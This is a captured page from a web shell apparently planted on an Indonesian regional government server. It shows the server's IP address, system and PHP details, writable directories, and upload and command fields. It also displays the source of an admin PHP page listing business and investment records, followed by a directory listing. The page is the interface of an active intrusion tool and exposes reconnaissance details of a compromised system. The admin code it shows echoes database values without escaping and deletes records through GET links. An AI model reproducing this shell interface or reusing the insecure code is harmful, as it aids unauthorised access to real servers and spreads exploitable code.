p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.108
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/dpmptsp/public_html/home/admin/page/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /home/dpmptsp/public_html/home/admin/page/promosi.php
<section role="main" class="content-body">
<?php
if($_GET['tipe']=='umkm') {	
?>	
					<!-- start: page -->
						<section class="panel panel-featured panel-featured-primary" style="margin-top:-60px;">
							<header class="panel-heading">
								<div class="panel-actions">
									<a href="#" class="fa fa-caret-down"></a>
								</div>
								<h2 class="panel-title"><i class="fa fa-list"></i> DATA UMKM</h2>
							</header>
							<div class="panel-body">
								<a href="index.php?page=formUMKM&act=add" class="mb-xs mt-xs mr-xs btn btn-primary"><i class="fa fa-plus-square"></i> Tambah Data Baru</a>
								<hr class="dotted short">
								<table class="table table-bordered table-striped mb-none" id="datatable-default">
									<thead>
										<tr>
											<th width="10px" >No</th>
											<th>Nama UMKM</th>
											<th>Nama Pemilik</th>
											<th>No. HP/WA</th>
											<th>Jenis Usaha</th>
											<th>NIB</th>																						
											<th>Alamat UMKM</th>
											<th>Modal</th>
											<th>Video</th>
											<th width="150px">Act</th>
										</tr>									
									</thead>
									<tbody>
									<?php
									$stmt = $conn->prepare("SELECT * FROM tbl_umkm ORDER BY umkmID DESC"); 
									$stmt->execute();
									$data = $stmt->fetchAll();
									$stmt->closeCursor();
									$x=1;
									//debug($data);
									foreach($data as $v){
									echo '
									    <tr>										
                                        	<td>'.$x.'</td>
                                        	<td>'.$v['umkmNama'].'</td>
                                        	<td>'.$v['umkmPemilik'].'</td>
                                        	<td>'.$v['umkmHP'].'</td>
                                        	<td>'.$v['umkmJenis'].'</td>
                                        	<td>'.$v['umkmNIB'].'</td>																																
                                        	<td>'.$v['umkmAlamat'].'</td>
                                        	<td>'.$v['umkmModal'].'</td>
                                        	<td>'.$v['umkmVideo'].'</td>
                                        	<td align="center">
												<a href="index.php?page=formUMKM&act=edit&id='.$v['umkmID'].'" class="mb-xs mt-xs mr-xs btn btn-default" role="button"><i class="fa fa-pencil"></i></a>
												<a href="#modalHeaderColorPrimary'.$v['umkmID'].'" class="mb-xs mt-xs mr-xs btn btn-default modal-basic" role="button"  ><i class="fa fa-trash-o"></i></a>												
											</td>											
										</tr>';											
									$x++;
									}
									?>										
									</tbody>
								</table>
							</div>						
						</section>
						<?php
						foreach($data as $v){
						?>
						<div id="modalHeaderColorPrimary<?php echo $v['umkmID'];?>" class="modal-block modal-header-color modal-block-primary mfp-hide">
							<section class="panel">
								<header class="panel-heading">
									<h2 class="panel-title">Are you sure?</h2>
								</header>
								<div class="panel-body">
									<div class="modal-wrapper">
										<div class="modal-icon">
											<i class="fa fa-trash-o"></i>
										</div>
										<div class="modal-text">
											<h4>Hapus</h4>
											<p>Apakah Anda Ingin menghapus Data "<?php echo $v['umkmNama'];?>" ?</p>
										</div>
									</div>
								</div>
								<footer class="panel-footer">
									<div class="row">
										<div class="col-md-12 text-right">
											<a href="index.php?act=deleteUMKM&id=<?php echo $v['umkmID'];?>" class="btn btn-primary">Ya</a>
											<button class="btn btn-default modal-dismiss">Tidak</button>
										</div>
									</div>
								</footer>
							</section>
						</div>
						<?php
						}
						?>						
<?php
}elseif(($_GET['tipe']=='pma')){
?>	
						<section class="panel panel-featured panel-featured-primary" style="margin-top:-60px;">
							<header class="panel-heading">
								<div class="panel-actions">
									<a href="#" class="fa fa-caret-down"></a>
								</div>
								<h2 class="panel-title"><i class="fa fa-list"></i> DATA PENANAMAN MODAL ASING (PMA)</h2>
							</header>
							<div class="panel-body">
								<a href="index.php?page=formPMA&act=add" class="mb-xs mt-xs mr-xs btn btn-primary"><i class="fa fa-plus-square"></i> Tambah Data Baru</a>
								<hr class="dotted short">
								<table class="table table-bordered table-striped mb-none" id="datatable-default">
									<thead>
										<tr>
											<th width="10px" >No</th>
											<th>Sektor</th>
											<th>Sub Sektor</th>
											<th>Nama Usaha</th>
											<th>Negara</th>
											<th>Alamat</th>
											<th>email</th>																						
											<th>Bidang Usaha</th>
											<th>Investasi</th>
											<th>Video</th>
											<th width="150px">Act</th>
										</tr>										
									</thead>
									<tbody>
									<?php
									$stmt = $conn->prepare("SELECT * FROM tbl_ub WHERE ubTipe='PMA' ORDER BY ubID DESC"); 
									$stmt->execute();
									$data = $stmt->fetchAll();
									$stmt->closeCursor();
									$x=1;
									//debug($data);
									foreach($data as $v){
									echo '
									    <tr>										
                                        	<td>'.$x.'</td>
                                        	<td>'.$v['ubSektor'].'</td>
                                        	<td>'.$v['ubSubSektor'].'</td>
                                        	<td>'.$v['ubNama'].'</td>
                                        	<td>'.$v['ubNegara'].'</td>
                                        	<td>'.$v['ubAlamat'].'</td>																																
                                        	<td>'.$v['ubEmail'].'</td>
                                        	<td>'.$v['ubBidangUsaha'].'</td>
                                        	<td>'.$v['ubInvestasi'].'</td>
                                        	<td>'.$v['umkmVideo'].'</td>
                                        	<td align="center">
												<a href="index.php?page=formPMA&act=edit&id='.$v['ubID'].'" class="mb-xs mt-xs mr-xs btn btn-default" role="button"><i class="fa fa-pencil"></i></a>
												<a href="#modalHeaderColorPrimary'.$v['ubID'].'" class="mb-xs mt-xs mr-xs btn btn-default modal-basic" role="button"  ><i class="fa fa-trash-o"></i></a>												
											</td>											
										</tr>';											
									$x++;
									}
									?>										
									</tbody>
								</table>
							</div>						
						</section>
						<?php
						foreach($data as $v){
						?>
						<div id="modalHeaderColorPrimary<?php echo $v['ubID'];?>" class="modal-block modal-header-color modal-block-primary mfp-hide">
							<section class="panel">
								<header class="panel-heading">
									<h2 class="panel-title">Are you sure?</h2>
								</header>
								<div class="panel-body">
									<div class="modal-wrapper">
										<div class="modal-icon">
											<i class="fa fa-trash-o"></i>
										</div>
										<div class="modal-text">
											<h4>Hapus</h4>
											<p>Apakah Anda Ingin menghapus Data "<?php echo $v['ubNama'];?>" ?</p>
										</div>
									</div>
								</div>
								<footer class="panel-footer">
									<div class="row">
										<div class="col-md-12 text-right">
											<a href="index.php?act=deleteUB&id=<?php echo $v['ubID'];?>&tipe=pma" class="btn btn-primary">Ya</a>
											<button class="btn btn-default modal-dismiss">Tidak</button>
										</div>
									</div>
								</footer>
							</section>
						</div>
						<?php
						}
						?>						

<?php	
}elseif(($_GET['tipe']=='pmdn')){
?>	
						<section class="panel panel-featured panel-featured-primary" style="margin-top:-60px;">
							<header class="panel-heading">
								<div class="panel-actions">
									<a href="#" class="fa fa-caret-down"></a>
								</div>
								<h2 class="panel-title"><i class="fa fa-list"></i> DATA PENANAMAN MODAL DALAM NEGERI (PMDN)</h2>
							</header>
							<div class="panel-body">
								<a href="index.php?page=formPMDN&act=add" class="mb-xs mt-xs mr-xs btn btn-primary"><i class="fa fa-plus-square"></i> Tambah Data Baru</a>
								<hr class="dotted short">
								<table class="table table-bordered table-striped mb-none" id="datatable-default">
									<thead>
										<tr>
											<th width="10px" >No</th>
											<th>Sektor</th>
											<th>Sub Sektor</th>
											<th>Nama Usaha</th>
											<th>Alamat</th>
											<th>email</th>																						
											<th>Bidang Usaha</th>
											<th>Investasi</th>
											<th>Video</th>
											<th width="150px">Act</th>
										</tr>										
									</thead>
									<tbody>
									<?php
									$stmt = $conn->prepare("SELECT * FROM tbl_ub WHERE ubTipe='PMDN' ORDER BY ubID DESC"); 
									$stmt->execute();
									$data = $stmt->fetchAll();
									$stmt->closeCursor();
									$x=1;
									//debug($data);
									foreach($data as $v){
									echo '
									    <tr>										
                                        	<td>'.$x.'</td>
                                        	<td>'.$v['ubSektor'].'</td>
                                        	<td>'.$v['ubSubSektor'].'</td>
                                        	<td>'.$v['ubNama'].'</td>
                                        	<td>'.$v['ubAlamat'].'</td>																																
                                        	<td>'.$v['ubEmail'].'</td>
                                        	<td>'.$v['ubBidangUsaha'].'</td>
                                        	<td>'.$v['ubInvestasi'].'</td>
                                        	<td>'.$v['umkmVideo'].'</td>
                                        	<td align="center">
												<a href="index.php?page=formPMDN&act=edit&id='.$v['ubID'].'" class="mb-xs mt-xs mr-xs btn btn-default" role="button"><i class="fa fa-pencil"></i></a>
												<a href="#modalHeaderColorPrimary'.$v['ubID'].'" class="mb-xs mt-xs mr-xs btn btn-default modal-basic" role="button"  ><i class="fa fa-trash-o"></i></a>												
											</td>											
										</tr>';											
									$x++;
									}
									?>										
									</tbody>
								</table>
							</div>						
						</section>
						<?php
						foreach($data as $v){
						?>
						<div id="modalHeaderColorPrimary<?php echo $v['ubID'];?>" class="modal-block modal-header-color modal-block-primary mfp-hide">
							<section class="panel">
								<header class="panel-heading">
									<h2 class="panel-title">Are you sure?</h2>
								</header>
								<div class="panel-body">
									<div class="modal-wrapper">
										<div class="modal-icon">
											<i class="fa fa-trash-o"></i>
										</div>
										<div class="modal-text">
											<h4>Hapus</h4>
											<p>Apakah Anda Ingin menghapus Data "<?php echo $v['ubNama'];?>" ?</p>
										</div>
									</div>
								</div>
								<footer class="panel-footer">
									<div class="row">
										<div class="col-md-12 text-right">
											<a href="index.php?act=deleteUB&id=<?php echo $v['ubID'];?>&tipe=pmdn" class="btn btn-primary">Ya</a>
											<button class="btn btn-default modal-dismiss">Tidak</button>
										</div>
									</div>
								</footer>
							</section>
						</div>
						<?php
						}
						?>						

<?php	
}
?>

</section>
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
December 21 2023 09:33:10
1000 / 1000
0755
about.php
5.217 KB
January 13 2024 08:37:55
1000 / 1000
0755
artikel.php
10.718 KB
January 13 2024 08:37:55
1000 / 1000
0755
dashboard.php
6.179 KB
January 13 2024 08:37:55
1000 / 1000
0755
formPMA.php
9.67 KB
January 13 2024 08:37:55
1000 / 1000
0755
formPMDN.php
9.462 KB
January 13 2024 08:37:55
1000 / 1000
0755
formUMKM.php
6.325 KB
January 13 2024 08:37:56
1000 / 1000
0755
index.html
0 KB
January 13 2024 08:37:56
1000 / 1000
0755
jabatan.php
6.976 KB
January 13 2024 08:37:56
1000 / 1000
0755
log.php
11.471 KB
January 13 2024 08:37:56
1000 / 1000
0755
partner.php
8.179 KB
January 13 2024 08:37:56
1000 / 1000
0755
perizinan.php
7.02 KB
January 13 2024 08:37:56
1000 / 1000
0755
promosi.php
11.417 KB
January 13 2024 08:37:56
1000 / 1000
0755
struktur.php
13.235 KB
January 13 2024 08:37:56
1000 / 1000
0755
user.php
20.516 KB
January 13 2024 08:37:56
1000 / 1000
0755